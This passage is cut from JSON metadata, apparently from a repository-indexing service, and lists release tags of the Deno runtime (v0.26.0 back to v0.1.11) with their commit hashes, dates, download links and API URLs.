manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.